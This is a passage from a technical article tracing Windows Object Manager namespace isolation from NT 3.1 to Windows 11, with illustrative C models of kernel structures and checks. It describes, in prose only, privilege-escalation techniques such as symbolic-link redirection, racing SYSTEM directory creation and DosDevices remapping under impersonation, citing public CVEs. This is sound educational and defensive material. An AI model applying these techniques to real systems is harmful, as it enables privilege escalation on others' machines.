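To make the open-or-create trap concrete, here is a minimal user-space sketch in C. It calls no Windows API: `NamedObject`, `open_or_create`, and the `world_writable` flag are hypothetical stand-ins for a shared directory such as the pre-Vista \BaseNamedObjects, `CreateEvent`-style semantics, and a permissive DACL. The `existed` out-parameter plays the role that `GetLastError() == ERROR_ALREADY_EXISTS` plays for a real caller.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical model of one shared named-object directory.
   Not a Windows API; fields and sizes are illustrative only. */
typedef struct {
    char name[64];
    char owner[32];      /* principal that created the object */
    bool world_writable; /* stands in for a permissive DACL */
} NamedObject;

static NamedObject g_directory[16];
static size_t g_count;

/* Open-or-create: if the name already exists, the caller silently receives
   the existing object, security settings and all. *existed mirrors
   GetLastError() == ERROR_ALREADY_EXISTS. */
static NamedObject *open_or_create(const char *name, const char *caller,
                                   bool world_writable, bool *existed) {
    for (size_t i = 0; i < g_count; i++) {
        if (strcmp(g_directory[i].name, name) == 0) {
            *existed = true;
            return &g_directory[i];
        }
    }
    if (g_count == sizeof g_directory / sizeof g_directory[0])
        return NULL; /* directory full */
    NamedObject *obj = &g_directory[g_count++];
    snprintf(obj->name, sizeof obj->name, "%s", name);
    snprintf(obj->owner, sizeof obj->owner, "%s", caller);
    obj->world_writable = world_writable;
    *existed = false;
    return obj;
}
```

In this model, a service that must own its object would treat `existed == true` as a failure rather than carry on with an object someone else created.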

The third class was symbolic-link redirection. Pre-Vista Windows let low-privilege users create two kinds of symbolic link: Object Manager symbolic links inside \?? (the per-session DOS-devices view) and NTFS mount points on disk. The attack pattern was the same in both. A privileged process is asked to open a path the user controls part of. The user has pre-planted a symbolic link partway through the path that redirects the residual walk into a target the user could not otherwise write. The privileged process opens the redirected file and treats it as if it were the original.

Forshaw's 2015 Project Zero post on the symbolic-link hardening generation is the canonical taxonomy: "There are three types of symbolic links you can access from a low privileged user, Object Manager Symbolic Links, Registry Key Symbolic Links and NTFS Mount Points" [@p0-symlink-mitigations]. His worked example for the Internet Explorer 11 EPM sandbox is CVE-2015-0055 [@nvd-cve-2015-0055], described in the post as "an information disclosure issue in the IE EPM sandbox which abused symbolic links to bypass a security check."
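The redirection step itself is prefix substitution during the walk. The sketch below is a hypothetical model, not Object Manager code: `SymLink`, `resolve_links`, the `\UserTemp\Logs` path, and the 32-hop limit are all illustrative. It shows a privileged opener asking for a file under a user-writable directory and landing somewhere else because the user planted a link there.

```c
#include <stdio.h>
#include <string.h>

typedef struct {
    const char *link;   /* path at which the link object lives */
    const char *target; /* what the walk continues with instead */
} SymLink;

#define SKETCH_MAX_REPARSE 32 /* hypothetical hop limit that stops link loops */

/* Rewrites `path` in place while any link matches a whole-component prefix.
   Returns the number of substitutions, or -1 on overflow or a reparse loop. */
static int resolve_links(char *path, size_t cap, const SymLink *links, size_t n) {
    int hops = 0;
    for (size_t i = 0; i < n; ) {
        size_t len = strlen(links[i].link);
        if (strncmp(path, links[i].link, len) != 0 ||
            (path[len] != '\0' && path[len] != '\\')) { /* whole components only */
            i++;
            continue;
        }
        char rest[512];
        int r = snprintf(rest, sizeof rest, "%s", path + len);
        if (r < 0 || (size_t)r >= sizeof rest) return -1;
        int w = snprintf(path, cap, "%s%s", links[i].target, rest);
        if (w < 0 || (size_t)w >= cap || ++hops > SKETCH_MAX_REPARSE) return -1;
        i = 0; /* rescan: the substituted path may cross another link */
    }
    return hops;
}
```

The component check matters: a link at `\UserTemp\Logs` must not capture `\UserTemp\LogsArchive`, which is why the sketch requires the match to end at a backslash or at the end of the path.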

The aha moment from this section is the one Microsoft eventually conceded. The pre-Vista failure mode was not three independent bug families. It was one structural problem -- a single global namespace shared by every principal -- with three faces. No amount of per-service patching could close it. The fix had to be architectural: the namespace itself had to be partitioned.

The Interactive Services Detection Service (ISDS) was Vista's backward-compatibility hack for legacy services that drew GUIs into Session 0. ISDS displayed the prompt "An interactive service has requested attention," which let the user switch to Session 0 long enough to dismiss the dialog. It was deprecated in Windows 10 1803 and remains a historical artifact of how much pre-Vista code assumed services and users would share a window station.

That fix took five years to ship. Windows Vista RTM was released on November 8, 2006 and General Availability arrived on January 30, 2007 [@en-wikipedia-windows-vista]. Vista did not ship one fix; it shipped three independent partition mechanisms in the same release window, because the structural failure had three faces and each face needed its own mechanism. The next section catalogues those mechanisms and the four additional generations of additive isolation that have built on them since.

4. Six generations of namespace isolation

The namespace itself has not been rearchitected since 1993. What has evolved, in six discrete generations between 1993 and 2026, is the set of partition primitives layered on top: the mechanisms that let the kernel hide subtrees from particular callers, rewrite paths transparently for particular tokens, or invoke a registered watcher when a particular handle is created. Each generation closes a structural class. None has rendered its predecessor obsolete. On 2026 Windows 11 25H2 all six are simultaneously load-bearing.

flowchart LR
    G1["Gen 1<br/>NT 3.1, Jul 1993<br/>Single global namespace"] --> G2
    G2["Gen 2<br/>Vista, Jan 2007 / SP1, Feb 2008<br/>Session 0 + MIC + ObRegisterCallbacks"] --> G3
    G3["Gen 3<br/>Windows 8, Oct 2012<br/>AppContainer / Lowbox / per-package directory"] --> G4
    G4["Gen 4<br/>Windows 10 RTM, Jul 2015<br/>VBS / IUM secure-kernel namespace"] --> G5
    G5["Gen 5<br/>Windows Server 2016, Oct 2016<br/>Server Silos / silo-scoped views"] --> G6
    G6["Gen 6<br/>MS15-090, Aug 2015 -><br/>symbolic-link class hardening"]

Generation numbering is thematic (by isolation capability introduced) rather than strictly chronological. Gen 6 (MS15-090, August 11, 2015) predates Gen 5 (Windows Server 2016, October 12, 2016) by 14 months; the numbering reflects the logical layering of isolation mechanisms, not their calendar sequence.

4.1 Generation 2 -- Session 0 isolation, integrity levels, ObRegisterCallbacks

Vista shipped three mechanisms in one release window because the structural failure had three faces.

The first was Session 0 isolation. From Vista forward, services run in Session 0 alone; the first interactive logon starts at Session 1. Each session gets its own subtree at \Sessions\<n>\BaseNamedObjects, \Sessions\<n>\Windows\WindowStations, and \Sessions\<n>\DosDevices. The Win32 Local\ prefix routes through kernel32!BaseGetNamedObjectDirectory into the per-session BNO; Global\ routes into the shared \BaseNamedObjects [@ms-termserv-kernel-object-namespaces]. The Wikipedia Shatter article preserves the architectural fix verbatim: "Local user logins were moved from Session 0 to Session 1, thus separating the user's processes from system services that could be vulnerable" [@en-wikipedia-shatter-attack]. After Vista an interactive user could no longer SendMessage(WM_TIMER) into a service's hidden window because the user and the service no longer shared a window station.
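The Local\ and Global\ routing can be approximated as a pure string mapping. This sketch is a simplification: `bno_path` is a hypothetical helper, it flattens into string rewriting what the real per-session directory implements with its own entries for the prefixes, and it assumes Session 0 maps Local\ straight onto \BaseNamedObjects.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: maps a Win32 object name, as seen from `session`,
   to the kernel directory path it would land in. */
static int bno_path(unsigned session, const char *name, char *out, size_t cap) {
    char local_root[64];
    if (session == 0) /* assumption: Session 0 uses the global BNO directly */
        snprintf(local_root, sizeof local_root, "\\BaseNamedObjects");
    else
        snprintf(local_root, sizeof local_root,
                 "\\Sessions\\%u\\BaseNamedObjects", session);

    const char *root = local_root;
    if (strncmp(name, "Global\\", 7) == 0) {        /* shared across sessions */
        root = "\\BaseNamedObjects";
        name += 7;
    } else if (strncmp(name, "Local\\", 6) == 0) {  /* caller's session */
        name += 6;
    }                                               /* unprefixed: also local */
    int w = snprintf(out, cap, "%s\\%s", root, name);
    return (w >= 0 && (size_t)w < cap) ? 0 : -1;
}
```

Under this model, `Local\Foo` from Session 1 and `Local\Foo` from Session 2 land in different directories, which is exactly what moved interactive users out of the services' namespace.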

The second mechanism was Mandatory Integrity Control. Vista introduced a new ACE type, SYSTEM_MANDATORY_LABEL_ACE, carried in an object's SACL; objects without one are treated as Medium. Each token carries an integrity level, most commonly one of four (Low S-1-16-4096, Medium S-1-16-8192, High S-1-16-12288, or System S-1-16-16384), and the Security Reference Monitor compares the requester's level against the object's level after path resolution succeeds [@en-wikipedia-mandatory-integrity-control]. MIC is not a namespace partition. A Low-IL process and a Medium-IL process resolve the same \BaseNamedObjects directory; only the open is denied at the leaf. The structural property MIC adds is that the leaf check is unbypassable from user mode; the check fires regardless of which DACL the object carries.
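A minimal sketch of the leaf check MIC adds, assuming the default no-write-up policy. The RID values mirror the S-1-16-x levels above and the three `POLICY_NO_*_UP` bits use the same values as winnt.h's `SYSTEM_MANDATORY_LABEL_NO_*_UP` constants; `mic_allows` and the `WANT_*` categories are hypothetical simplifications of the real access-mask logic. Passing this check only means the request proceeds to the ordinary DACL evaluation.

```c
#include <stdbool.h>
#include <stdint.h>

/* Integrity-level RIDs: the last sub-authority of S-1-16-x. */
enum { IL_LOW = 0x1000, IL_MEDIUM = 0x2000, IL_HIGH = 0x3000, IL_SYSTEM = 0x4000 };

/* Same values as SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / _NO_READ_UP / _NO_EXECUTE_UP. */
#define POLICY_NO_WRITE_UP   0x1u
#define POLICY_NO_READ_UP    0x2u
#define POLICY_NO_EXECUTE_UP 0x4u

/* Hypothetical coarse access categories; the kernel works on a mapped ACCESS_MASK. */
#define WANT_READ    0x1u
#define WANT_WRITE   0x2u
#define WANT_EXECUTE 0x4u

/* True if the mandatory check lets the request go on to the DACL check.
   A caller at or above the object's level is never stopped here. */
static bool mic_allows(uint32_t caller_il, uint32_t object_il,
                       uint32_t policy, uint32_t wanted) {
    if (caller_il >= object_il) return true;
    if ((policy & POLICY_NO_WRITE_UP)   && (wanted & WANT_WRITE))   return false;
    if ((policy & POLICY_NO_READ_UP)    && (wanted & WANT_READ))    return false;
    if ((policy & POLICY_NO_EXECUTE_UP) && (wanted & WANT_EXECUTE)) return false;
    return true;
}
```

Note that the function never looks at names: a Low caller that resolves the same \BaseNamedObjects path as a Medium caller is stopped only here, at the leaf.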

The third mechanism was ObRegisterCallbacks. Microsoft's wdm.h documentation records the API's first ship date verbatim: "Available starting with Windows Vista with Service Pack 1 (SP1) and Windows Server 2008" [@ms-obregistercallbacks]. The API lets a KMCS-signed driver intercept handle creation and handle duplication on PsProcessType, PsThreadType, and the desktop object type. The registration carries an Altitude (a FltMgr-style collision key) and an array of OB_OPERATION_REGISTRATION records [@ms-ob-callback-registration]. Pre-operation callbacks can strip access-mask bits before the handle is granted; post-operation callbacks fire for logging. The parallel API PsSetCreateProcessNotifyRoutineEx [@ms-pssetcreateprocessnotifyroutineex] covers process creation. Together, these are the kernel-mode primitives every modern EDR product depends on. ObRegisterCallbacks ships inside the Object Manager itself, and it is the reason an EDR knows when something opens a handle to lsass.exe.
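The pre-operation contract is easiest to see in a user-space model. In a real driver the callback receives an `OB_PRE_OPERATION_INFORMATION` and may narrow `Parameters->CreateHandleInformation.DesiredAccess` (or its duplicate-handle counterpart); here `PreOpInfo` and `edr_pre_op` are hypothetical stand-ins, the target is identified by a plain image-name string for brevity, and the access-right values match winnt.h's `PROCESS_*` constants.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Process access rights, same numeric values as winnt.h. */
#define P_TERMINATE     0x0001u
#define P_CREATE_THREAD 0x0002u
#define P_VM_OPERATION  0x0008u
#define P_VM_READ       0x0010u
#define P_VM_WRITE      0x0020u
#define P_QUERY_LIMITED 0x1000u

/* Hypothetical stand-in for the fields a pre-operation callback sees. */
typedef struct {
    bool kernel_handle;       /* kernel-mode opens are left alone */
    const char *target_image; /* illustrative; real drivers identify the target differently */
    uint32_t desired_access;  /* the callback may only clear bits */
} PreOpInfo;

static const uint32_t kStripFromLsass =
    P_TERMINATE | P_CREATE_THREAD | P_VM_OPERATION | P_VM_READ | P_VM_WRITE;

/* Strip memory, thread, and terminate rights from user-mode handles to
   lsass.exe; leave every other request untouched. */
static void edr_pre_op(PreOpInfo *info) {
    if (info->kernel_handle) return;
    if (strcmp(info->target_image, "lsass.exe") != 0) return;
    info->desired_access &= ~kStripFromLsass;
}
```

The design point is that the callback narrows rather than denies: the opener still gets a handle, just one that cannot read lsass.exe memory.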

4.2 Generation 3 -- AppContainer and the lowbox token

Windows 8 shipped on October 26, 2012 [@en-wikipedia-windows-8]. Windows Store apps (the "Modern" apps that Windows 10 later generalised as UWP) needed a sandbox finer-grained than the per-session BNO. The Vista path rewriting in kernel32!BaseGetNamedObjectDirectory happened in user mode, which made it the wrong layer for a sandbox: a hostile renderer could in principle skip the user-mode rewrite by calling the native NT object APIs with an absolute path. The new layer moved into the kernel.

Each UWP / MSIX process runs under a special token type, the AppContainer / LowBox token (referred to in kernel code as the lowbox token), created by NtCreateLowBoxToken. The token carries a TOKEN_APPCONTAINER_INFORMATION block that names the process's package SID (S-1-15-2-...) and an AppContainerNumber. Inside ObpLookupObjectName, before the path is walked, the kernel checks whether the caller's token is a lowbox token; if it is, lookups of \BaseNamedObjects\X, \RPC Control\X, and other rewriteable paths get redirected into \Sessions\<n>\AppContainerNamedObjects\<package-sid>\X. The user-mode caller never sees the rewrite. The package-SID directory is created by SYSTEM at process-creation time with a security descriptor that grants the package SID, and only the package SID, full access. Microsoft's wording is precise: AppContainer works by "sandboxing the application kernel objects, the AppContainer environment prevents the application from influencing, or being influenced by, other application processes" [@ms-appcontainer-isolation].

The AppInfo service, which is responsible for creating the new application, calls the undocumented API CreateAppContainerToken to do some internal housekeeping. Unfortunately this API creates object directories under the user's AppContainerNamedObjects object directory to support redirecting BaseNamedObjects and RPC endpoints by the OS. -- James Forshaw, Project Zero Issue 1550 [@p0-issue1550]

The residual class the AppContainer model has not closed is the one documented in Forshaw's August 30, 2018 Project Zero issue report [@p0-issue1550]: because the SYSTEM-side AppInfo service has to write into the user's AppContainerNamedObjects subtree to set up redirection, an unprivileged caller can race the directory creation and plant a symbolic link that the SYSTEM service then follows. The class -- "SYSTEM-privileged directory creation in user-controllable territory" -- is the worked example of why "the kernel rewrites the name" is an isolation property only when the SYSTEM helpers also use the rewrite.

4.3 Generation 4 -- VBS trustlets and the IUM secure-kernel namespace

Windows 10 RTM shipped on July 29, 2015 [@en-wikipedia-windows-10-version-history]. The Virtualization-Based Security (VBS) feature set introduced a parallel object-manager-shaped namespace that lives in Virtual Trust Level 1 (VTL1) and is inaccessible to the VTL0 NT kernel. Inside VTL1 the Secure Kernel (securekernel.exe) maintains its own root, its own type registry, and its own handle-table machinery. The VTL0 NT kernel can see trustlet processes -- the per-trustlet user-mode containers running in Isolated User Mode (IUM) -- but it cannot reach into their secure-side state.

Alex Ionescu's Black Hat USA 2015 talk Battle of SKM and IUM [@ionescu-bh2015-pdf] is the canonical inventory of the inbox Trustlet IDs at ship: Trustlet 0 is the Secure Kernel Process hosting Device Guard; Trustlet 1 is LSAISO.EXE for Credential Guard; Trustlet 2 is VMSP.EXE hosting the virtual TPM; Trustlet 3 is the vTPM provisioning trustlet. Each is identified by a Trustlet ID and reachable only through narrow Secure Kernel ALPC ports. The VBS Trustlets piece in this series unpacks the threat model.

4.4 Generation 5 -- Server Silos and the silo-scoped namespace

Windows Server 2016 shipped on October 12, 2016 [@en-wikipedia-windows-server-2016]. Microsoft needed a Linux-namespaces equivalent so that container runtimes -- Docker, containerd, and the Azure Kubernetes Service Windows-node pods that followed -- could host adjacent workloads on one kernel. The answer was Server Silo: a new OBJECT_TYPE registered alongside Job, Process, and Thread, that carries its own RootDirectory, DosDevicesDirectory, and ServerSiloGlobals. A process attached to a silo via PsAttachSiloToCurrentThread sees the silo's namespace as its root; the silo's \GLOBAL??\C: resolves to the silo's \Device\HarddiskVolume*, which is a different Device object from the host's. Job objects [@ms-job-objects] provide the cgroups-equivalent resource-accounting dimension; the Silo type builds on top.

The canonical reverse-engineering reference is Daniel Prizmant's July 2020 Unit 42 writeup, which spells out the architecture: "job objects are used in a similar way control groups (cgroups) are used in Linux, and... server silo objects were used as a replacement for namespaces support in the kernel" [@unit42-rev-eng-windows-containers].

The companion piece, Prizmant's June 2021 Siloscape writeup [@unit42-siloscape], describes the first known malware targeting Windows containers, built to escape the silo boundary: Prizmant named the malware "Siloscape (sounds like silo escape) because its primary goal is to escape the container, and in Windows this is implemented mainly by a server silo." James Forshaw's April 2021 Project Zero post Who Contains the Containers? [@p0-who-contains-containers] is the four-LPE companion disclosure. Microsoft's standing position is that Server Silo is not a security boundary; the Hyper-V Container, which adds a Hyper-V VM around the container's silo, is the security-boundary product.

4.5 Generation 6 -- the symbolic-link hardening continuum

The cross-cutting hardening generation closes the symlink subclass that recurred in Generations 1, 3, and 5. MS15-090 shipped on August 11, 2015 [@ms-ms15-090] and "corrects how Windows Object Manager handles object symbolic links created by a sandbox process, by preventing improper interaction with the registry by sandboxed applications, and by preventing improper interaction with the filesystem by sandboxed applications." The bulletin's canonical Object Manager CVE is CVE-2015-2428 [@nvd-cve-2015-2428], described verbatim as the case where the "Object Manager in Microsoft Windows... does not properly constrain impersonation levels during interaction with object symbolic links that originated in a sandboxed process." Subsequent Windows 10 builds added OBJ_DONT_REPARSE, an open-time flag that disables symbolic-link substitution for callers willing to opt in, and post-Siloscape patches in 2021 closed NtSetInformationSymbolicLink retargeting from inside a silo.
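The opt-in flavour of this hardening is simple to model: the caller sets a flag, and the open fails rather than following a link. The sketch is hypothetical and only one hop deep; `sketch_open`, `Link`, and `OpenStatus` are illustrative, and `SKETCH_OBJ_DONT_REPARSE` borrows the bit value that `OBJ_DONT_REPARSE` has in ntdef.h (0x1000) purely as a label, not as a claim about how the kernel consumes it.

```c
#include <stdio.h>
#include <string.h>

/* Same bit value as OBJ_DONT_REPARSE in ntdef.h; used here only as a flag. */
#define SKETCH_OBJ_DONT_REPARSE 0x1000u

typedef enum { OPEN_OK, OPEN_REPARSE_REFUSED, OPEN_NAME_TOO_LONG } OpenStatus;
typedef struct { const char *link; const char *target; } Link;

/* If `path` crosses a link, either substitute it or, when the caller opted
   out of reparsing, refuse. The resolved path is written to `out`. */
static OpenStatus sketch_open(const char *path, unsigned attributes,
                              const Link *links, size_t n, char *out, size_t cap) {
    const char *prefix = "";
    const char *rest = path;
    for (size_t i = 0; i < n; i++) {
        size_t len = strlen(links[i].link);
        if (strncmp(path, links[i].link, len) == 0 &&
            (path[len] == '\0' || path[len] == '\\')) {
            if (attributes & SKETCH_OBJ_DONT_REPARSE) return OPEN_REPARSE_REFUSED;
            prefix = links[i].target;
            rest = path + len;
            break;
        }
    }
    int w = snprintf(out, cap, "%s%s", prefix, rest);
    return (w >= 0 && (size_t)w < cap) ? OPEN_OK : OPEN_NAME_TOO_LONG;
}
```

The trade-off is that this protection only exists for callers who ask for it, which is why the prose calls it opt-in.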

The scope document for this article originally attributed MS15-090 to CVE-2015-2528 and CVE-2015-1463. Independent NVD verification confirmed neither is correct: CVE-2015-2528 [@nvd-cve-2015-2528] is the MS15-102 Task Management EoP, and CVE-2015-1463 [@nvd-cve-2015-1463] is a ClamAV denial-of-service crash. The canonical MS15-090 OM-symlink CVE is CVE-2015-2428. Separately, CVE-2018-0824 [@nvd-cve-2018-0824] is a CWE-502 COM deserialization issue that joined the CISA KEV catalog on 2024-08-05, not a namespace-squatting CVE.

The residual subclass MS15-090 did not close was the per-session \?? DosDevices remapping path under impersonation. A low-privileged process whose token is impersonated by a SYSTEM service can plant a DefineDosDevice remapping that survives into the impersonation-time \?? view, and the SYSTEM-side activation-context resolver then opens the redirected path while running with elevated privileges. The canonical 2023 worked example is HackSys's Activation Context Hell -- DosDevices Remapping Attack under Impersonation [@hacksys-activation-context-hell], which targets the CSRSS / SxS activation-context resolver and shipped as CVE-2023-35359 [@nvd-cve-2023-35359], with the closely-related CVE-2022-22047 [@nvd-cve-2022-22047] covering the underlying CSRSS surface. The mitigation has to live inside the impersonation-aware \?? resolver in the SYSTEM caller, not at the symlink-creation gate.
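A minimal model of why the fix has to sit in the SYSTEM caller: while impersonating, drive-letter resolution consults the impersonated token's device map before the global one. `DosDevice`, `DeviceMap`, `resolve_drive`, and the `ignore_impersonated` switch are hypothetical; the switch mirrors the intent of the `OBJ_IGNORE_IMPERSONATED_DEVICEMAP` object attribute, but this is not its implementation.

```c
#include <string.h>

/* Hypothetical drive-letter tables: a per-logon map consulted first,
   then the global one (standing in for \GLOBAL??). */
typedef struct { const char *drive; const char *device; } DosDevice;
typedef struct { const DosDevice *map; size_t n; } DeviceMap;

static const DosDevice kGlobal[] = { { "C:", "\\Device\\HarddiskVolume3" } };

static const char *lookup(const DeviceMap *m, const char *drive) {
    for (size_t i = 0; i < m->n; i++)
        if (strcmp(m->map[i].drive, drive) == 0) return m->map[i].device;
    return NULL;
}

/* Resolve a drive letter as an impersonating thread would: the impersonated
   token's map first (unless told to ignore it), then the global map. */
static const char *resolve_drive(const DeviceMap *impersonated,
                                 int ignore_impersonated, const char *drive) {
    const char *dev = NULL;
    if (impersonated != NULL && !ignore_impersonated)
        dev = lookup(impersonated, drive);
    if (dev == NULL) {
        DeviceMap global = { kGlobal, sizeof kGlobal / sizeof kGlobal[0] };
        dev = lookup(&global, drive);
    }
    return dev;
}
```

In this model, the symlink-creation gate never fires: the attacker only edits their own map, and the damage happens when a privileged caller reads it.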

Note: Every generation since Generation 1 has layered a new isolation primitive on top of the prior generation. None has rendered its predecessor obsolete. On 2026 Windows 11 25H2 all six generations coexist: a UWP / MSIX app inside a Server Silo on a VBS-enabled host is session-partitioned, lowbox-rewritten, silo-scoped, VTL0-confined, integrity-gated, and watched by every loaded EDR's ObRegisterCallbacks filter. Each layer adds an independent enforcement point somewhere between ObpLookupObjectName and the moment a handle is granted.

Six generations of isolation primitives is a tidy story, but it has glossed the most important question. What is the actual kernel data structure all six generations parameterize? What does the path-walk algorithm look like, what is the type registry, and where does the hash table live?

5. The four load-bearing primitives

If you remember one paragraph from this article, make it this one. The Object Manager namespace is built out of four kernel data structures: an OBJECT_HEADER that prefixes every named object in memory, an OBJECT_TYPE singleton that owns each type's method table, a ParseProcedure that delegates path resolution to the owning subsystem when needed, and an OBJECT_DIRECTORY hash table that maps names to objects. Every Windows security boundary you have read about is a parameter to one of these four pieces. The next eight subsections rebuild them one at a time.

flowchart TB
    OD["OBJECT_DIRECTORY<br/>(37-bucket hash table)"] -->|"hash(name) % 37"| OH
    OH["OBJECT_HEADER<br/>(PointerCount, HandleCount,<br/>TypeIndex, InfoMask,<br/>SecurityDescriptor, Body offset)"] -->|"TypeIndex XOR<br/>ObHeaderCookie"| OT
    OT["OBJECT_TYPE singleton<br/>(in nt!ObTypeIndexTable)"] -->|"TypeInfo"| TI
    TI["TYPE_INFO method table<br/>(Dump, Open, Close, Delete,<br/>ParseProcedure,<br/>Security, QueryName, ...)"]
    OH -->|"Body[]"| BODY["Type-specific body<br/>(EPROCESS, FILE_OBJECT,<br/>SECTION_OBJECT, ...)"]

5.1 OBJECT_HEADER

Every Object Manager object, named or not, lives in kernel pool (paged or non-paged, depending on its type). Immediately before each object's typed body sits an OBJECT_HEADER, a 0x30-byte (48-byte) structure on x64 that the Object Manager owns. PointerCount and HandleCount are the two reference counts: the former tracks kernel-mode pointer references, the latter tracks open handles. TypeIndex is a single byte that indexes into nt!ObTypeIndexTable to find the object's type singleton; since Windows 10 1709, the byte is XOR-obfuscated against the per-boot nt!ObHeaderCookie so that forging a type through a corrupted header is no longer trivial.
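The obfuscation described above reduces to a round-trip XOR. The sketch models only what this section states, a single-byte index XORed with a per-boot cookie; `SketchHeader`, both helpers, and the cookie value are hypothetical. Reverse-engineering writeups report that real builds also mix in a byte derived from the header's address, which is omitted here.

```c
#include <stdint.h>

/* Hypothetical header fragment; every other OBJECT_HEADER field is elided. */
typedef struct {
    uint8_t type_index; /* stored (obfuscated) value, as found in memory */
} SketchHeader;

/* What object creation stores in this model. */
static uint8_t encode_type_index(uint8_t real_index, uint8_t cookie) {
    return (uint8_t)(real_index ^ cookie);
}

/* What the kernel computes before indexing ObTypeIndexTable in this model. */
static uint8_t decode_type_index(const SketchHeader *h, uint8_t cookie) {
    return (uint8_t)(h->type_index ^ cookie);
}
```

The point of the design: an attacker who overwrites the byte with a raw table index, without knowing the cookie, gets a different and unpredictable type after decoding.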

InfoMask is a bitmap of optional sub-headers that may precede the main header: OBJECT_HEADER_NAME_INFO for named objects, OBJECT_HEADER_QUOTA_INFO for objects that charge a quota block, OBJECT_HEADER_HANDLE_INFO for objects that need per-process handle accounting. SecurityDescriptor is a tagged pointer to the object's security descriptor, which carries the DACL and SACL. Body[] is the offset at which the type-specific payload begins; for a process object that payload is an EPROCESS, for a file it is a FILE_OBJECT, and so on. The canonical reference is the Object Manager coverage in Windows Internals 7th Edition [@microsoftpressstore-wininternals7-part1], which sits in Chapter 8 ("System mechanisms") of Part 2.
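The InfoMask layout lends itself to a small computation: each optional sub-header sits below the main header, so its offset back from the header is the total size of the present sub-headers between it and the header. In this sketch the bit assignments and x64 sizes are illustrative assumptions rather than values taken from a Microsoft header, and `info_offset` is a hypothetical helper.

```c
#include <stdint.h>

/* Illustrative InfoMask bits and sub-header sizes; treat both as assumptions. */
enum { INFO_CREATOR = 0x01, INFO_NAME = 0x02, INFO_HANDLE = 0x04, INFO_QUOTA = 0x08 };
static const uint32_t kSubHeaderSize[4] = { 0x20, 0x20, 0x10, 0x20 }; /* by bit position */

/* Sub-headers are stacked below OBJECT_HEADER, lowest bit nearest the header.
   The distance back to sub-header `bit` is the sum of the sizes of every
   present sub-header whose bit is <= `bit`. Returns 0 if it is absent. */
static uint32_t info_offset(uint8_t info_mask, uint8_t bit) {
    if (!(info_mask & bit)) return 0;
    uint8_t covered = (uint8_t)(info_mask & (bit | (bit - 1)));
    uint32_t offset = 0;
    for (unsigned pos = 0; pos < 4; pos++)
        if (covered & (1u << pos)) offset += kSubHeaderSize[pos];
    return offset;
}
```

Because the offset depends only on the mask and the requested bit, it can be precomputed into a small table instead of summed on every lookup.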

The per-object header (`nt!_OBJECT_HEADER`) that precedes every Object Manager object in kernel pool. Carries reference counts (`PointerCount`, `HandleCount`), a `TypeIndex` byte that points into `nt!ObTypeIndexTable` (XOR-obfuscated against `nt!ObHeaderCookie` since Windows 10 1709), an `InfoMask` describing optional sub-headers, a `SecurityDescriptor` pointer, and the offset to the typed `Body[]`.

The TypeIndex XOR-with-cookie is one of the smallest kernel hardening changes Microsoft has shipped: a single byte that prevents a poisoned OBJECT_HEADER from naming an arbitrary type after a heap-corruption primitive. The cookie is per-boot and lives in nt!ObHeaderCookie. The hardening is documented in Windows Internals 7th Edition Chapter 8 [@microsoftpressstore-wininternals7-part1] and in Geoff Chappell's reverse-engineering studies; Microsoft has not, as of 2026, published a Learn-hosted reference for the cookie itself.

5.2 OBJECT_TYPE

OBJECT_TYPE is the per-type singleton. There is exactly one OBJECT_TYPE per registered kernel type, and they live in \ObjectTypes. On Windows 11 25H2 the count sits at roughly seventy-five: Type, Directory, SymbolicLink, Token, Job, Process, Thread, Section, Key, File, Event, Mutant, Semaphore, Timer, WindowStation, Desktop, Device, Driver, IoCompletion, ALPC Port, EtwRegistration, Silo, and dozens more.

The per-type singleton (`nt!_OBJECT_TYPE`) that owns each kernel type's method table. The `TypeInfo` field carries eight procedure pointers -- `DumpProcedure`, `OpenProcedure`, `CloseProcedure`, `DeleteProcedure`, `ParseProcedure` (the path-resolution callback), `SecurityProcedure`, `QueryNameProcedure`, and `OkayToCloseProcedure` -- plus one offset field, `WaitObjectFlagOffset`, used by waitable types. Every `OBJECT_TYPE` instance is reachable through `\ObjectTypes`.

The TypeInfo field on each OBJECT_TYPE carries eight procedure pointers and one offset field (WaitObjectFlagOffset). The most consequential is the ParseProcedure. When ObpLookupObjectName is walking a path component-by-component, and a step lands on an object whose OBJECT_TYPE defines a ParseProcedure, the OM hands the residual path and the desired access to that procedure, which becomes the namespace authority below that point. That is how the registry's Key type, the I/O Manager's Device type, and the various WMI / Volume-Manager subsystems insert themselves into the namespace without the Object Manager having to know any of their internal structure [@en-wikipedia-object-manager].
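Generic Object Manager code never needs to know what a Device or a Key is; it only asks the type singleton. A hypothetical C model of that dispatch follows: `SketchObjectType` carries a small subset of the `TypeInfo` pointers, `device_parse` stands in for IopParseDevice, and the string it produces is illustrative.

```c
#include <stddef.h>
#include <stdio.h>

struct SketchObject;
typedef int  (*ParseProc)(struct SketchObject *self, const char *remaining,
                          char *out, size_t cap);
typedef void (*CloseProc)(struct SketchObject *self);

/* Hypothetical subset of TypeInfo. A NULL parse pointer means "ordinary
   namespace node": the walker keeps going with the directory lookup. */
typedef struct {
    const char *name;
    ParseProc parse;
    CloseProc close;
} SketchObjectType;

typedef struct SketchObject {
    const SketchObjectType *type; /* shared singleton, one per type */
    const char *object_name;
    int close_calls;              /* bookkeeping for the demo */
} SketchObject;

/* Stand-in for IopParseDevice: forward the residual path to the "driver". */
static int device_parse(SketchObject *self, const char *remaining, char *out, size_t cap) {
    int w = snprintf(out, cap, "IRP_MJ_CREATE to %s for %s", self->object_name, remaining);
    return (w >= 0 && (size_t)w < cap) ? 0 : -1;
}

static void count_close(SketchObject *self) { self->close_calls++; }

static const SketchObjectType kDirectoryType = { "Directory", NULL, count_close };
static const SketchObjectType kDeviceType    = { "Device", device_parse, count_close };

/* Generic code asks the type, never the object, what it can do. */
static int om_has_parse(const SketchObject *o) { return o->type->parse != NULL; }
static void om_close(SketchObject *o) { if (o->type->close) o->type->close(o); }
```

Adding a new namespace authority in this model means registering one more type with a non-NULL `parse`; the generic code does not change.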

5.3 The parse procedure

ObpLookupObjectName walks \Foo\Bar\Baz\...\Leaf left-to-right. At each component the walker does one of three things. The common case is a hash-table lookup in the current OBJECT_DIRECTORY's 37 buckets to find the child object by name. The second case is SymbolicLink substitution: if the child object's type is SymbolicLink, the walker substitutes the link target and re-enters the walk at the substitution. The third and most consequential case is parse-procedure handoff. If the child object's OBJECT_TYPE has a non-null ParseProcedure, the walker stops, hands the residual path string to that procedure, and lets it decide what to do.
